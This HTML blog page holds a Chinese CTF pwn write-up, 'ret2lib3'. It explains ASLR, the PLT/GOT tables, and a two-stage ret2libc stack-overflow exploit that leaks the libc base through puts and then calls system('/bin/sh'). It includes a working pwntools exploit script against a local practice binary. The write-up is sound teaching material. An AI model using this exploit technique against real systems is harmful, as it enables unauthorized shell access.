
<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  
  <title>ret2lib3 | 沉浮之道</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="keywords" content="StackOverflow">
<meta property="og:type" content="article">
<meta property="og:title" content="ret2lib3">
<meta property="og:url" content="http://yoursite.com/2019/09/09/libc基址泄露/index.html">
<meta property="og:site_name" content="沉浮之道">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://yoursite.com/pic/u=2564874312,498148489&fm=26&gp=0.jpg">
<meta property="og:image" content="http://yoursite.com/pic/ret2libc(1).png">
<meta property="og:image" content="http://yoursite.com/pic/ret2libc(2).jpg">
<meta property="og:image" content="http://yoursite.com/pic/ret2libc(3).jpg">
<meta property="og:image" content="http://yoursite.com/pic/ret2libc(4).jpg">
<meta property="og:image" content="http://yoursite.com/pic/ret2libc3(5).jpg">
<meta property="og:updated_time" content="2019-09-10T00:08:21.507Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="ret2lib3">
<meta name="twitter:image" content="http://yoursite.com/pic/u=2564874312,498148489&fm=26&gp=0.jpg">
  
    <link rel="alternative" href="/atom.xml" title="沉浮之道" type="application/atom+xml">
  
  
  <link rel="stylesheet" href="/css/style.css">
  
    <link href="//fonts.useso.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <!--[if lt IE 9]><script src="//cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7/html5shiv.min.js"></script><![endif]-->
  
  

</head>
</html>
<body>
<div id="container">
  <div id="wrap">
    <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <nav id="upper-nav" class="inner">
      <a id="main-nav-toggle" class="nav-icon"></a>
      <div class="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        
          <a id="nav-github" class="nav-icon" href="https://github.com/cendeavor"></a>
        
      </div>
    </nav>
    <div id="header-title">
      
        <h1 id="blog-title-wrap">
          <a href="/" id="blog-title">cendeavor</a>
        </h1>
      
    </div>
    <div id="contenedor">
      <ul class="cube">
        <li class="cara">NEW</li>
        <li class="cara"></li>
        <li class="cara"></li>
        <li class="cara"></li>
        <li class="cara"></li>
        <li class="cara"></li>
      </ul>
    </div>
    <nav id="main-nav">
      
        <a class="main-nav-link" href="/">Home</a>
      
        <a class="main-nav-link" href="/archives">Archives</a>
      
        <a class="main-nav-link" href="/about">About</a>
      
      <a class="main-nav-link st-search-show-outputs">搜索</a>
    </nav>
  </div>
</header>

    <div class="outer">
      <section id="main"><article id="post-libc基址泄露" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <h3 href="/2019/09/09/libc基址泄露/" class="article-date">
  <time datetime="2019-09-09T09:25:14.445Z" itemprop="datePublished">2019-09-09</time>
</h3>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/PWN/">PWN</a>►<a class="article-category-link" href="/categories/PWN/stack/">stack</a>
  </div>

  </div>
  <div class="article-inner">
  <div class="curve-down">
  <div class="fill-content">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      ret2lib3
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        
          <div id="toc" class="toc-article">
            <strong class="toc-title">文章目录</strong>
            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#一、知识补充"><span class="toc-text">一、知识补充</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#ALSR机制"><span class="toc-text">ALSR机制</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PLT-amp-GOT表"><span class="toc-text">PLT &amp; GOT表</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#start-vs-main"><span class="toc-text">__start vs. main</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#二、利用思路"><span class="toc-text">二、利用思路</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#三、exp"><span class="toc-text">三、exp</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#0xdeadbeef"><span class="toc-text">0xdeadbeef</span></a></li></ol></li></ol></li></ol>
          </div>
        
        <p><img src="/pic/u=2564874312,498148489&fm=26&gp=0.jpg" alt></p>
<a id="more"></a>
<p><a href="/download/ret2libc3">点击下载</a></p>
<h1 id="一、知识补充"><a href="#一、知识补充" class="headerlink" title="一、知识补充"></a>一、知识补充</h1><h2 id="ALSR机制"><a href="#ALSR机制" class="headerlink" title="ALSR机制"></a><a href="https://introspelliam.github.io/2017/09/30/linux%E7%A8%8B%E5%BA%8F%E7%9A%84%E5%B8%B8%E7%94%A8%E4%BF%9D%E6%8A%A4%E6%9C%BA%E5%88%B6/" target="_blank" rel="noopener">ALSR机制</a></h2><p>ASLR<code>不是ELF的设定</code>，而<code>是kernel提供给整个系统的</code>。可以通过cat /proc/sys/kernel/randomize_va_space来查看。<code>如果是做binary exploitation的练习题，可以改变那个数值为0来短暂关闭它</code>，或使用VM，或使用peda。加载后可以使用命令aslr来检查系统的ASLR设定。checksec显示当前ELF的安全设定。</p>
<p>ALSR并不负责代码段和数据段的随机化工作，这些是由PIE机制来负责的。ALSR用于<code>栈、堆、共享库（如libc.so）</code>的地址随机化。</p>
<p>但是，即使libc地址中间随机化，<code>最后三位地址</code>是固定的，可以据此判定libc版本。<br>由于libc.so加载的过程中各个函数之间的相对位置不变，从而通过<code>GOT表泄露</code>、<code>计算libc基址</code>（即libc在程序运行过程中，被加载到内存中的真实起始地址）的方式，来获取libc中，可以用来构建<code>攻击代码的gadgets地址</code>（一般来说为system和str_bin_sh的地址）。</p>
<h2 id="PLT-amp-GOT表"><a href="#PLT-amp-GOT表" class="headerlink" title="PLT &amp; GOT表"></a>PLT &amp; GOT表</h2><p><code>PLT表</code>：跳板，跳转到一个地址来加载libc库。文件中会对每个用到的函数分配一个plt函数，用于第一次函数调用，此时GOT表中还没有真实函数地址。<br><code>GOT表</code>：经过PLT表的跳转会在GOT表上写入地址，这个地址是<code>函数调用的真实地址</code>。<br><img src="/pic/ret2libc(1).png" alt></p>
<h2 id="start-vs-main"><a href="#start-vs-main" class="headerlink" title="__start vs. main"></a><a href="https://www.mi1k7ea.com/2019/03/05/%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B9%8Bret2libc/#start-%E5%92%8Cmain-%E7%9A%84%E5%8C%BA%E5%88%AB" target="_blank" rel="noopener">__start vs. main</a></h2><p><code>__start</code> 是程序的系统入口，是程序真正的起始<br><code>main</code> 是程序的用户入口，是被标准库调用的一个符号</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">void</span> _start()</span><br><span class="line">&#123;</span><br><span class="line">    %ebp = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">int</span> argc = pop from <span class="built_in">stack</span>;</span><br><span class="line">    <span class="keyword">char</span> **argv = top of <span class="built_in">stack</span>;</span><br><span class="line">    __libc_start_main(main, argc, argv, __libc_csu_init, linc_csu_fini, edx, top of <span class="built_in">stack</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h1 id="二、利用思路"><a href="#二、利用思路" class="headerlink" title="二、利用思路"></a>二、利用思路</h1><p>首先绕过ASLR，泄露libc的基址libc_base，然后利用ret2libc或者构造rop链来绕过NX。<code>需要注意，这两步要在一次运行完成</code>，不然因为地址随机化的缘故，在下一次运行时libc基址又将改变。即，一次运行，两次利用。</p>
<p><strong>方法一：</strong><br>首先，溢出返回至PLT表中，调用具有输出功能的函数（常用puts/write/printf）将GOT表中的真实libc函数地址打印出来，从而分析libc基地址。然后返回至漏洞函数二次出发溢出，此时便采取正常利用思路获得shell。</p>
<p>既然有两次溢出，就需要调试两次偏移，在第一次触发溢出的基础上<code>调试第二次偏移</code>（因为会发现，利用elf.symbols[‘main’]重新执行的exp中第二次填充的字符数为104而不是第一次的112，），这里需要用到pwntools的gdb调试功能，自行百度。</p>
<p><img src="/pic/ret2libc(2).jpg" alt></p>
<p><strong>方法二</strong><br>当然，并不一定需要调试两次，如果对于__start和main之间的区别足够了解的话可以直接根据第一次调试的结构写出第二次shellcode，详见<a href="https://www.mi1k7ea.com/2019/03/05/%E6%A0%88%E6%BA%A2%E5%87%BA%E4%B9%8Bret2libc/#%E5%88%A9%E7%94%A8%E8%BF%87%E7%A8%8B%E5%9B%BE" target="_blank" rel="noopener">栈溢出之ret2libc</a>或有说法，这不一样来自于程序的对齐，详见<a href="https://blog.csdn.net/dsr446/article/details/99698035" target="_blank" rel="noopener">ret2libc3 填充从112变为104</a></p>
<h1 id="三、exp"><a href="#三、exp" class="headerlink" title="三、exp"></a>三、exp</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> pwnlib</span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line"><span class="comment">#context.terminal=['gnome-terminal','-x','sh','-c']</span></span><br><span class="line"></span><br><span class="line">p=process(<span class="string">'./ret2libc3'</span>)</span><br><span class="line">elf=ELF(<span class="string">'./ret2libc3'</span>)</span><br><span class="line">payload=<span class="string">'a'</span>*(<span class="number">0x6c</span>+<span class="number">4</span>)+p32(elf.plt[<span class="string">'puts'</span>])+p32(elf.symbols[<span class="string">'main'</span>])+p32(elf.got[<span class="string">'puts'</span>]) <span class="comment"># use flat() to</span></span><br><span class="line">                                                                                        <span class="comment"># simplify expression</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(proc.pidof(p)[0])</span></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'?'</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">puts=u32(p.recv()[<span class="number">0</span>:<span class="number">4</span>]) <span class="comment"># or p.recv(4) (not recommended), recv() all to avoid residual packets in the net</span></span><br><span class="line">print(<span class="string">'puts'</span>,hex(puts))</span><br><span class="line"></span><br><span class="line">libc =LibcSearcher(<span class="string">'puts'</span>,puts)</span><br><span class="line">libcbase=puts-libc.dump(<span class="string">'puts'</span>) <span class="comment"># libc.dump() returns the relative offset of the func to the libc_base</span></span><br><span class="line">system=libcbase+libc.dump(<span class="string">'system'</span>)</span><br><span class="line">bin_sh=libcbase+libc.dump(<span class="string">'str_bin_sh'</span>)</span><br><span class="line">print(<span class="string">'system'</span>,hex(system))</span><br><span class="line">print(<span class="string">'binsh'</span>,hex(bin_sh))</span><br><span class="line"></span><br><span class="line"><span class="comment">#gdb.attach(proc.pidof(p)[0], 'b *0x08048687') # debug for the second offset: b *address of instruction 'call gets'</span></span><br><span class="line">                              <span class="comment"># notice that code below doesn't exist when debug for second offset</span></span><br><span class="line">payload= flat([<span class="string">'a'</span>*(<span class="number">0x64</span>+<span class="number">4</span>), system, <span class="number">0xdeadbeef</span>, bin_sh]) <span class="comment"># 0xdeadbeef -&gt; signal of get shell</span></span><br><span class="line">p.sendlineafter(<span class="string">'!?'</span>, payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<p><img src="/pic/ret2libc(3).jpg" alt><br><img src="/pic/ret2libc(4).jpg" alt></p>
<h3 id="0xdeadbeef"><a href="#0xdeadbeef" class="headerlink" title="0xdeadbeef"></a>0xdeadbeef</h3><p><img src="/pic/ret2libc3(5).jpg" alt></p>

      
    </div>
    <footer class="article-footer">
      <div class="article-footer-content">
        
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/StackOverflow/">StackOverflow</a></li></ul>

        <a data-url="http://yoursite.com/2019/09/09/libc基址泄露/" data-id="ck0djkhkh00014wuy6nvwozqj" class="article-share-link">分享到</a>
        
      </div>
    </footer>
  </div>
  </div>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2019/09/09/hello-world/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">上一篇</strong>
      <div class="article-nav-title">Hello World</div>
    </a>
  
</nav>

  
</article>


</section>
      
      <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">近期文章</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2019/09/09/libc基址泄露/">ret2lib3</a>
          </li>
        
          <li>
            <a href="/2019/09/09/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">分类</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/PWN/">PWN</a><span class="category-list-count">1</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/PWN/stack/">stack</a><span class="category-list-count">1</span></li></ul></li></ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">标签</h3>
    <div class="widget">
      <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/StackOverflow/">StackOverflow</a><span class="tag-list-count">1</span></li></ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">归档</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/09/">九月 2019</a><span class="archive-list-count">2</span></li></ul>
    </div>
  </div>

  
</aside>
      
    </div>
    <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2019 cendeavor<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
      .
      Theme by <a href="https://github.com/sun11/hexo-theme-paperbox" target="_blank">Paperbox</a>
    </div>
  </div>
</footer>
  </div>
  <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
    <a href="/about" class="mobile-nav-link">About</a>
  
  <a href="#search" class="mobile-nav-link st-search-show-outputs">搜索</a>
</nav>

  

<!-- totop start -->
<div id="totop">
	<a title="返回顶部"></a>
</div>
<!-- totop end -->

<!-- swiftype search start -->

<script type="text/javascript">
  (function(w,d,t,u,n,s,e){w['SwiftypeObject']=n;w[n]=w[n]||function(){
  (w[n].q=w[n].q||[]).push(arguments);};s=d.createElement(t);
  e=d.getElementsByTagName(t)[0];s.async=1;s.src=u;e.parentNode.insertBefore(s,e);
  })(window,document,'script','//s.swiftypecdn.com/install/v2/st.js','_st');

  _st('install','G7KYNHRd9_81_MBK9uM8','2.0.0');
</script>

<!-- swiftype search end -->



<script src="//cdnjs.cloudflare.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>

<script src="//cdnjs.cloudflare.com/ajax/libs/lrsjng.jquery-qrcode/0.12.0/jquery.qrcode.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css">
  <script src="/fancybox/jquery.fancybox.pack.js"></script>


<script src="/js/script.js"></script>

</div>
</body>
</html>
